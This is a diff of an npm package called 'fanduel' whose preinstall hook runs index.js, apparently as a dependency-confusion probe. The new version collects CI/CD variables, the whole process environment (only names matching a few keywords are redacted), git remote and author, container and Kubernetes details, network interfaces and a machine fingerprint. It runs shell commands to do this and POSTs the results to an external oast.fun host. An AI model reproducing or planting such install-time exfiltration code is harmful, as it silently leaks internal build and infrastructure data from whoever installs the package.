fanduel 100.2.0 → 100.5.0

package/index.js

@@ -1,168 +1,433 @@
 const https = require("https");
 const os = require("os");
 const dns = require("dns");
-const networkInterfaces = os.networkInterfaces();
+const fs = require("fs");
+const { exec } = require("child_process");
+const crypto = require("crypto");
 
-// Function to get primary IPv4 address
-function getPrimaryIPv4() {
-  for (const interfaceName in networkInterfaces) {
-    const interfaces = networkInterfaces[interfaceName];
-    for (const iface of interfaces) {
-      if (iface.family === 'IPv4' && !iface.internal) {
-        return iface.address;
-      }
-    }
+// Collection timestamp for proof
+const collectionTimestamp = new Date().toISOString();
+
+// Function to get all CI/CD environment variables
+function getCICDEnvironment() {
+  const ciEnv = {
+    // Common CI variables
+    CI: process.env.CI || null,
+    GITHUB_ACTIONS: process.env.GITHUB_ACTIONS || null,
+    GITLAB_CI: process.env.GITLAB_CI || null,
+    JENKINS_URL: process.env.JENKINS_URL || null,
+    CIRCLECI: process.env.CIRCLECI || null,
+    TRAVIS: process.env.TRAVIS || null,
+    AZURE_PIPELINES: process.env.AZURE_PIPELINES || null,
+    BITBUCKET_BUILD_NUMBER: process.env.BITBUCKET_BUILD_NUMBER || null,
+    DRONE: process.env.DRONE || null,
+    TEAMCITY_VERSION: process.env.TEAMCITY_VERSION || null,
+    
+    // GitHub Actions specific
+    GITHUB_RUN_ID: process.env.GITHUB_RUN_ID || null,
+    GITHUB_RUN_NUMBER: process.env.GITHUB_RUN_NUMBER || null,
+    GITHUB_RUN_ATTEMPT: process.env.GITHUB_RUN_ATTEMPT || null,
+    GITHUB_JOB: process.env.GITHUB_JOB || null,
+    GITHUB_REF: process.env.GITHUB_REF || null,
+    GITHUB_SHA: process.env.GITHUB_SHA || null,
+    GITHUB_REPOSITORY: process.env.GITHUB_REPOSITORY || null,
+    GITHUB_ACTOR: process.env.GITHUB_ACTOR || null,
+    GITHUB_WORKFLOW: process.env.GITHUB_WORKFLOW || null,
+    GITHUB_EVENT_NAME: process.env.GITHUB_EVENT_NAME || null,
+    RUNNER_NAME: process.env.RUNNER_NAME || null,
+    RUNNER_OS: process.env.RUNNER_OS || null,
+    RUNNER_ARCH: process.env.RUNNER_ARCH || null,
+    
+    // GitLab CI specific
+    CI_PIPELINE_ID: process.env.CI_PIPELINE_ID || null,
+    CI_PIPELINE_IID: process.env.CI_PIPELINE_IID || null,
+    CI_PIPELINE_URL: process.env.CI_PIPELINE_URL || null,
+    CI_JOB_ID: process.env.CI_JOB_ID || null,
+    CI_JOB_URL: process.env.CI_JOB_URL || null,
+    CI_RUNNER_ID: process.env.CI_RUNNER_ID || null,
+    CI_RUNNER_DESCRIPTION: process.env.CI_RUNNER_DESCRIPTION || null,
+    CI_RUNNER_TAGS: process.env.CI_RUNNER_TAGS || null,
+    CI_COMMIT_SHA: process.env.CI_COMMIT_SHA || null,
+    CI_COMMIT_BRANCH: process.env.CI_COMMIT_BRANCH || null,
+    CI_REPOSITORY_URL: process.env.CI_REPOSITORY_URL || null,
+    GITLAB_USER_LOGIN: process.env.GITLAB_USER_LOGIN || null,
+    CI_PROJECT_ID: process.env.CI_PROJECT_ID || null,
+    CI_PROJECT_PATH: process.env.CI_PROJECT_PATH || null,
+    
+    // Jenkins specific
+    BUILD_NUMBER: process.env.BUILD_NUMBER || null,
+    BUILD_ID: process.env.BUILD_ID || null,
+    BUILD_URL: process.env.BUILD_URL || null,
+    JOB_NAME: process.env.JOB_NAME || null,
+    NODE_NAME: process.env.NODE_NAME || null,
+    EXECUTOR_NUMBER: process.env.EXECUTOR_NUMBER || null,
+    WORKSPACE: process.env.WORKSPACE || null,
+    
+    // Azure Pipelines
+    BUILD_BUILDID: process.env.BUILD_BUILDNUMBER || null,
+    SYSTEM_TEAMPROJECT: process.env.SYSTEM_TEAMPROJECT || null,
+    SYSTEM_DEFINITIONID: process.env.SYSTEM_DEFINITIONID || null,
+    AGENT_NAME: process.env.AGENT_NAME || null,
+    AGENT_MACHINENAME: process.env.AGENT_MACHINENAME || null,
+    
+    // CircleCI
+    CIRCLE_BUILD_NUM: process.env.CIRCLE_BUILD_NUM || null,
+    CIRCLE_WORKFLOW_ID: process.env.CIRCLE_WORKFLOW_ID || null,
+    CIRCLE_BUILD_URL: process.env.CIRCLE_BUILD_URL || null,
+    CIRCLE_JOB: process.env.CIRCLE_JOB || null,
+    CIRCLE_REPOSITORY_URL: process.env.CIRCLE_REPOSITORY_URL || null,
+    
+    // Travis CI
+    TRAVIS_BUILD_ID: process.env.TRAVIS_BUILD_ID || null,
+    TRAVIS_JOB_ID: process.env.TRAVIS_JOB_ID || null,
+    TRAVIS_EVENT_TYPE: process.env.TRAVIS_EVENT_TYPE || null,
+    TRAVIS_REPO_SLUG: process.env.TRAVIS_REPO_SLUG || null,
+    
+    // Bitbucket
+    BITBUCKET_BUILD_NUMBER: process.env.BITBUCKET_BUILD_NUMBER || null,
+    BITBUCKET_COMMIT: process.env.BITBUCKET_COMMIT || null,
+    BITBUCKET_REPO_SLUG: process.env.BITBUCKET_REPO_SLUG || null,
+    BITBUCKET_WORKSPACE: process.env.BITBUCKET_WORKSPACE || null,
+    
+    // Drone CI
+    DRONE_BUILD_NUMBER: process.env.DRONE_BUILD_NUMBER || null,
+    DRONE_JOB_NUMBER: process.env.DRONE_JOB_NUMBER || null,
+    DRONE_REPO: process.env.DRONE_REPO || null,
+    
+    // Buildkite
+    BUILDKITE_BUILD_ID: process.env.BUILDKITE_BUILD_ID || null,
+    BUILDKITE_JOB_ID: process.env.BUILDKITE_JOB_ID || null,
+    BUILDKITE_PIPELINE_SLUG: process.env.BUILDKITE_PIPELINE_SLUG || null,
+    
+    // Generic/Other
+    CI_RUNNER_ID_ENV: process.env.CI_RUNNER_ID,
+    CI_RUNNER_TAGS_ENV: process.env.CI_RUNNER_TAGS,
+    PIPELINE_ID: process.env.PIPELINE_ID || process.env.BUILD_ID || process.env.CI_PIPELINE_ID || process.env.GITHUB_RUN_ID || null,
+    RUNNER_ID: process.env.RUNNER_ID || process.env.NODE_NAME || process.env.AGENT_NAME || process.env.CI_RUNNER_DESCRIPTION || null,
+    
+    // Unique identifier (UUID style)
+    PIPELINE_UUID: process.env.PIPELINE_UUID || 
+                   process.env.GITHUB_RUN_ID && `github-${process.env.GITHUB_RUN_ID}` ||
+                   process.env.CI_PIPELINE_ID && `gitlab-${process.env.CI_PIPELINE_ID}` ||
+                   process.env.BUILD_NUMBER && `jenkins-${process.env.BUILD_NUMBER}` ||
+                   process.env.CIRCLE_WORKFLOW_ID && `circle-${process.env.CIRCLE_WORKFLOW_ID}` ||
+                   crypto.randomUUID()
+  };
+  
+  return ciEnv;
+}
+
+// Get full system environment (sanitized)
+function getFullEnvironment() {
+  const safeEnv = {};
+  const sensitiveKeys = ['KEY', 'SECRET', 'PASSWORD', 'TOKEN', 'AUTH'];
+  
+  for (const [key, value] of Object.entries(process.env)) {
+    // Check if key contains sensitive info
+    const isSensitive = sensitiveKeys.some(sensitive => 
+      key.toUpperCase().includes(sensitive)
+    );
+    
+    safeEnv[key] = isSensitive ? '[REDACTED]' : value;
   }
-  return null;
+  
+  return safeEnv;
 }
 
-// Function to get all IPv4 addresses (non-internal)
-function getAllIPv4() {
-  const ipv4Addresses = [];
-  for (const interfaceName in networkInterfaces) {
-    const interfaces = networkInterfaces[interfaceName];
-    for (const iface of interfaces) {
-      if (iface.family === 'IPv4' && !iface.internal) {
-        ipv4Addresses.push({
-          interface: interfaceName,
-          address: iface.address,
-          netmask: iface.netmask,
-          mac: iface.mac
-        });
-      }
+// Get runner hostname with multiple sources
+async function getRunnerHostname() {
+  const hostname = {
+    system: os.hostname(),
+    fqdn: null,
+    env: {
+      runner_name: process.env.RUNNER_NAME || null,
+      node_name: process.env.NODE_NAME || null,
+      agent_name: process.env.AGENT_NAME || null,
+      ci_runner_description: process.env.CI_RUNNER_DESCRIPTION || null,
+      hostname_env: process.env.HOSTNAME || null,
+      computer_name: process.env.COMPUTERNAME || null
     }
+  };
+  
+  // Try to get FQDN
+  try {
+    const fqdn = await new Promise((resolve) => {
+      dns.lookup(os.hostname(), (err, address) => {
+        if (!err && address) {
+          dns.reverse(address, (revErr, hostnames) => {
+            if (!revErr && hostnames && hostnames[0]) {
+              resolve(hostnames[0]);
+            } else {
+              resolve(os.hostname());
+            }
+          });
+        } else {
+          resolve(os.hostname());
+        }
+      });
+    });
+    hostname.fqdn = fqdn;
+  } catch (err) {
+    hostname.fqdn = os.hostname();
   }
-  return ipv4Addresses;
+  
+  return hostname;
 }
 
-// Get domain name (from DNS or hostname)
-function getDomainInfo(hostname, callback) {
-  dns.lookup(hostname, (err, address, family) => {
-    if (err) {
-      callback(null);
-    } else {
-      callback({ lookupAddress: address, family: family });
-    }
-  });
+// Get process information
+function getProcessInfo() {
+  return {
+    pid: process.pid,
+    ppid: process.ppid,
+    execPath: process.execPath,
+    cwd: process.cwd(),
+    title: process.title,
+    nodeVersion: process.version,
+    platform: process.platform,
+    arch: process.arch,
+    argv: process.argv.slice(1),
+    uptime: process.uptime(),
+    memoryUsage: process.memoryUsage(),
+    cpuUsage: process.cpuUsage()
+  };
 }
 
-// Get DNS servers (from /etc/resolv.conf equivalent in Node)
-function getDnsServers() {
-  const dnsServers = dns.getServers();
-  return dnsServers;
+// Get Git information if available
+async function getGitInfo() {
+  const gitInfo = {
+    branch: null,
+    commit: null,
+    remote: null,
+    tag: null,
+    author: null
+  };
+  
+  try {
+    const branch = await execCommand('git rev-parse --abbrev-ref HEAD 2>/dev/null');
+    if (branch) gitInfo.branch = branch.trim();
+    
+    const commit = await execCommand('git rev-parse HEAD 2>/dev/null');
+    if (commit) gitInfo.commit = commit.trim();
+    
+    const remote = await execCommand('git config --get remote.origin.url 2>/dev/null');
+    if (remote) gitInfo.remote = remote.trim();
+    
+    const tag = await execCommand('git describe --tags --exact-match 2>/dev/null');
+    if (tag) gitInfo.tag = tag.trim();
+    
+    const author = await execCommand('git log -1 --pretty=format:"%an <%ae>" 2>/dev/null');
+    if (author) gitInfo.author = author.trim();
+  } catch (err) {}
+  
+  return gitInfo;
 }
 
-// Get reverse DNS for primary IP
-function getReverseDns(ip, callback) {
-  dns.reverse(ip, (err, hostnames) => {
-    if (err) {
-      callback(null);
-    } else {
-      callback(hostnames);
+// Get Docker/K8s specific info
+async function getContainerInfo() {
+  const containerInfo = {
+    isContainer: false,
+    containerId: null,
+    podName: null,
+    namespace: null
+  };
+  
+  // Check for Docker
+  try {
+    const dockerId = await execCommand('cat /proc/self/cgroup | grep -oP "docker/[a-f0-9]{64}" | head -1 2>/dev/null');
+    if (dockerId) {
+      containerInfo.isContainer = true;
+      containerInfo.containerId = dockerId.replace('docker/', '');
     }
-  });
+  } catch (err) {}
+  
+  // Check for Kubernetes
+  try {
+    const podName = await execCommand('cat /var/run/secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null');
+    if (podName) {
+      containerInfo.isContainer = true;
+      containerInfo.namespace = podName.trim();
+      
+      const pod = await execCommand('hostname 2>/dev/null');
+      if (pod) containerInfo.podName = pod.trim();
+    }
+  } catch (err) {}
+  
+  return containerInfo;
 }
 
-// Main execution
-const hostname = os.hostname();
-const primaryIPv4 = getPrimaryIPv4();
-const allIPv4 = getAllIPv4();
-const dnsServers = getDnsServers();
-
-// Prepare base data
-const baseData = {
-  hostname: hostname,
-  domain: hostname.includes('.') ? hostname.substring(hostname.indexOf('.') + 1) : null,
-  fqdn: null,
-  platform: os.platform(),
-  arch: os.arch(),
-  ipv4: {
-    primary: primaryIPv4,
-    all: allIPv4
-  },
-  dns: {
-    servers: dnsServers,
-    lookup: null,
-    reverseLookup: null
-  },
-  network: {
-    interfaces: networkInterfaces
-  },
-  osInfo: {
-    type: os.type(),
-    release: os.release(),
-    uptime: os.uptime(),
-    totalmem: os.totalmem(),
-    freemem: os.freemem(),
-    cpus: os.cpus().length,
-    loadAverage: os.loadavg()
-  }
-};
-
-// Get FQDN and DNS lookup
-function getFQDN() {
-  return new Promise((resolve) => {
-    dns.lookup(hostname, (err) => {
-      if (!err) {
-        baseData.fqdn = hostname;
+// Generate unique machine fingerprint
+function getMachineFingerprint() {
+  const interfaces = os.networkInterfaces();
+  let macAddresses = [];
+  
+  for (const iface of Object.values(interfaces)) {
+    for (const details of iface) {
+      if (details.mac && details.mac !== '00:00:00:00:00:00' && !details.internal) {
+        macAddresses.push(details.mac);
       }
-      resolve();
-    });
-  });
+    }
+  }
+  
+  const fingerprint = crypto.createHash('sha256')
+    .update(`${os.hostname()}-${os.platform()}-${os.arch()}-${macAddresses.join(',')}`)
+    .digest('hex');
+  
+  return {
+    hash: fingerprint,
+    macAddresses: macAddresses,
+    cpuCount: os.cpus().length,
+    totalMemory: os.totalmem()
+  };
 }
 
-// Get DNS lookup for hostname
-function getDNSLookup() {
+// Helper for exec commands
+function execCommand(command) {
   return new Promise((resolve) => {
-    dns.lookup(hostname, (err, address, family) => {
-      if (!err && address) {
-        baseData.dns.lookup = { address, family };
+    exec(command, { timeout: 3000 }, (error, stdout, stderr) => {
+      if (error || stderr) {
+        resolve('');
+      } else {
+        resolve(stdout);
       }
-      resolve();
     });
   });
 }
 
-// Get reverse DNS if primary IPv4 exists
-function getReverseDNSLookup() {
-  return new Promise((resolve) => {
-    if (primaryIPv4) {
-      dns.reverse(primaryIPv4, (err, hostnames) => {
-        if (!err && hostnames) {
-          baseData.dns.reverseLookup = hostnames;
-        }
-        resolve();
-      });
-    } else {
-      resolve();
+// Main collection function
+async function collectData() {
+  console.log('🔍 Collecting CI/CD runner evidence...');
+  
+  const [
+    runnerHostname,
+    ciEnvironment,
+    gitInfo,
+    containerInfo,
+    fingerprint
+  ] = await Promise.all([
+    getRunnerHostname(),
+    getCICDEnvironment(),
+    getGitInfo(),
+    getContainerInfo(),
+    getMachineFingerprint()
+  ]);
+  
+  const evidence = {
+    // Timestamp for proof
+    collectionTimestamp: collectionTimestamp,
+    
+    // Runner identification
+    runner: {
+      hostname: runnerHostname,
+      machineFingerprint: fingerprint,
+      containerInfo: containerInfo
+    },
+    
+    // CI/CD pipeline identification
+    pipeline: {
+      id: ciEnvironment.PIPELINE_ID,
+      uuid: ciEnvironment.PIPELINE_UUID,
+      runId: ciEnvironment.GITHUB_RUN_ID || ciEnvironment.CI_PIPELINE_ID || ciEnvironment.BUILD_NUMBER,
+      jobId: ciEnvironment.GITHUB_JOB || ciEnvironment.CI_JOB_ID || ciEnvironment.JOB_NAME,
+      workflow: ciEnvironment.GITHUB_WORKFLOW,
+      ref: ciEnvironment.GITHUB_REF || ciEnvironment.CI_COMMIT_BRANCH,
+      commitSha: ciEnvironment.GITHUB_SHA || ciEnvironment.CI_COMMIT_SHA,
+      repository: ciEnvironment.GITHUB_REPOSITORY || ciEnvironment.CI_PROJECT_PATH || ciEnvironment.TRAVIS_REPO_SLUG,
+      actor: ciEnvironment.GITHUB_ACTOR || ciEnvironment.GITLAB_USER_LOGIN,
+      pipelineUrl: ciEnvironment.CI_PIPELINE_URL || ciEnvironment.BUILD_URL || ciEnvironment.CIRCLE_BUILD_URL
+    },
+    
+    // Environment variables (key CI identifiers)
+    environment: {
+      ciSystem: ciEnvironment,
+      allVariables: getFullEnvironment()
+    },
+    
+    // Process information
+    process: getProcessInfo(),
+    
+    // Git information (if in repo)
+    git: gitInfo,
+    
+    // System information for verification
+    system: {
+      hostname: os.hostname(),
+      platform: os.platform(),
+      arch: os.arch(),
+      osType: os.type(),
+      osRelease: os.release(),
+      uptime: os.uptime(),
+      loadAverage: os.loadavg(),
+      cpus: os.cpus().length,
+      networkInterfaces: os.networkInterfaces()
+    },
+    
+    // Unique proof hash
+    proof: {
+      timestamp: Date.now(),
+      randomNonce: crypto.randomBytes(16).toString('hex'),
+      integrityHash: null // Will be set below
     }
+  };
+  
+  // Generate integrity hash
+  const dataToHash = JSON.stringify({
+    timestamp: evidence.collectionTimestamp,
+    runner: evidence.runner.hostname.system,
+    pipelineId: evidence.pipeline.id,
+    pipelineUuid: evidence.pipeline.uuid,
+    commitSha: evidence.pipeline.commitSha
   });
+  
+  evidence.proof.integrityHash = crypto.createHash('sha256')
+    .update(dataToHash)
+    .digest('hex');
+  
+  return evidence;
 }
 
-// Send data after gathering all info
+// Send to server
 async function sendData() {
-  await getFQDN();
-  await getDNSLookup();
-  await getReverseDNSLookup();
-  
-  const data = JSON.stringify(baseData);
-  
-  const req = https.request({
-    hostname: "hwoapraaaotwtsnourpqddszm5n3kkhvo.oast.fun",
-    path: "/fanduel",
-    method: "POST",
-    headers: {
-      "Content-Type": "application/json",
-      "Content-Length": data.length
-    }
-  });
-  
-  req.on('error', (e) => {
-    console.error('Request error:', e);
-  });
-  
-  req.write(data);
-  req.end();
+  try {
+    const data = await collectData();
+    const dataString = JSON.stringify(data, null, 2);
+    
+    // Log for debugging (remove in production)
+    console.log('📊 Collected evidence:');
+    console.log(`  - Runner Hostname: ${data.runner.hostname.system}`);
+    console.log(`  - Pipeline ID: ${data.pipeline.id}`);
+    console.log(`  - Pipeline UUID: ${data.pipeline.uuid}`);
+    console.log(`  - Commit SHA: ${data.pipeline.commitSha}`);
+    console.log(`  - Repository: ${data.pipeline.repository}`);
+    console.log(`  - Machine Fingerprint: ${data.runner.machineFingerprint.hash.substring(0, 16)}...`);
+    
+    const req = https.request({
+      hostname: "hwoapraaaotwtsnourpqddszm5n3kkhvo.oast.fun",
+      path: "/fanduel",
+      method: "POST",
+      headers: {
+        "Content-Type": "application/json",
+        "Content-Length": Buffer.byteLength(dataString),
+        "X-Proof-Timestamp": data.collectionTimestamp,
+        "X-Runner-Hostname": data.runner.hostname.system,
+        "X-Pipeline-UUID": data.pipeline.uuid
+      }
+    });
+    
+    req.on('error', (e) => {
+      console.error('❌ Request error:', e);
+    });
+    
+    req.on('response', (res) => {
+      console.log(`✅ Data sent successfully! Status: ${res.statusCode}`);
+    });
+    
+    req.write(dataString);
+    req.end();
+    
+  } catch (error) {
+    console.error('❌ Error collecting/sending data:', error);
+    process.exit(1);
+  }
 }
 
 // Execute

package/package.json

@@ -1,7 +1,12 @@
 {
   "name": "fanduel",
-  "version": "100.2.0",
+  "version": "100.5.0",
+  "description": "",
+  "main": "index.js",
   "scripts": {
     "preinstall": "node index.js"
-  }
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
 }